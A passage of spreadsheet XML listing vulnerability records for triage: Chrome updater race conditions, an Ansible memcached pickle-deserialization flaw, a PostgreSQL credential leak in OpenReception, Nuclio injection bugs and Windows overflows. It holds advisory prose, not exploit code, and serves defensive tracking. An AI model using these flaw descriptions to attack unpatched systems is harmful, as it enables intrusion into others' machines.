          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H636" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I636" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87457</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87467</t>
        </is>
      </c>
      <c r="C637" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G637" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H637" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I637" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87467</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87509</t>
        </is>
      </c>
      <c r="C638" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G638" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H638" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I638" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87509</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87530</t>
        </is>
      </c>
      <c r="C639" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G639" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H639" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I639" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87530</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87554</t>
        </is>
      </c>
      <c r="C640" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G640" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H640" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>Race condition in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87554</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87874</t>
        </is>
      </c>
      <c r="C641" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G641" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the memcached cache plugin of the community.general Ansible
collection. Although its documentation states that records are stored in JSON
format, the plugin performs no explicit serialization and relies on
python-memcached, which pickles values on write and unpickles them on read.
Because memcached is unauthenticated and cache keys are predictable, an attacker
able to reach a network-exposed or shared memcached instance can write a crafted
pickle payload that is deserialized and executed on the Ansible controller when
the poisoned fact cache is next read, leading to remote code execution.</t>
        </is>
      </c>
      <c r="M641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87874</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87958</t>
        </is>
      </c>
      <c r="C642" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 is vulnerable to a denial of service where a specific functionality on a Db2 server can be disabled by a privileged user under certain conditions.</t>
        </is>
      </c>
      <c r="M642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87958</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47858</t>
        </is>
      </c>
      <c r="C643" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D643" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G643" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H643" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_tools</t>
        </is>
      </c>
      <c r="I643" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr">
        <is>
          <t>Starting Spring Boot applications in the Spring Tools with the live information mode enabled makes the running application vulnerable against JMX-based remote code execution.
Affected Spring Products and Versions:
Spring Tools for Eclipse: 5.2.0 and earlier
Spring Tools for VSCode / Cursor / Theia: 2.2.0 and earlier</t>
        </is>
      </c>
      <c r="M643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47858</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48080</t>
        </is>
      </c>
      <c r="C644" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G644" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the `GET /api/tenants/{id}` endpoint returns the full tenant record to any authenticated `TENANT_ADMIN` of that tenant, including the `databaseUrl` field. This field contains the live PostgreSQL connection string the application uses to connect to that tenant's database. In the tested official `docker-compose.prod.yml` deployment, the connection string contained the user `postgres` with `rolsuper=true` and the plaintext password from `secrets/postgres_password.txt`. Operators who configure a non-superuser PostgreSQL user via `secrets/postgres_user.txt` would expose a less privileged credential, but the disclosure of the connection string itself is independent of that choice. The same credential applies to every database managed by that PostgreSQL instance: the central `appointment_booking` database, every per-tenant database (one per tenant), and the postgres administrative database. A `TENANT_ADMIN` of one tenant who can reach `postgres:5432` (directly via internal network, indirectly via any SSRF, RCE, or file-read in the application) can read every other tenant's appointment ciphertexts, key shares, and metadata; read the central user table, including all `GLOBAL_ADMIN` accounts, password hashes, and session records; modify or delete any data in any tenant database; and/or i a superuser-scoped deployment: use PostgreSQL's `pg_read_server_files`, `COPY ... FROM PROGRAM`, and `CREATE EXTENSION` for further escalation inside the database container. This breaks the per-tenant database isolation that is otherwise the primary cross-tenant control in the application. The application code carefully scopes most queries to the calling tenant's database, but those scopings are irrelevant once the attacker holds the credentials that bypass the application entirely. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48080</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="C645" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D645" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G645" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="M645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52833</t>
        </is>
      </c>
      <c r="C646" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D646" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G646" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="M646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52833</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="C647" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G647" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="C648" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G648" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="C649" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G649" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="C650" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G650" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="C651" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G651" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="C652" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G652" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="C653" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G653" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L653" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="C654" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G654" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L654" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="C655" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G655" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="C656" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G656" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L656" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="C657" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G657" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="C658" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G658" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr">
        <is>
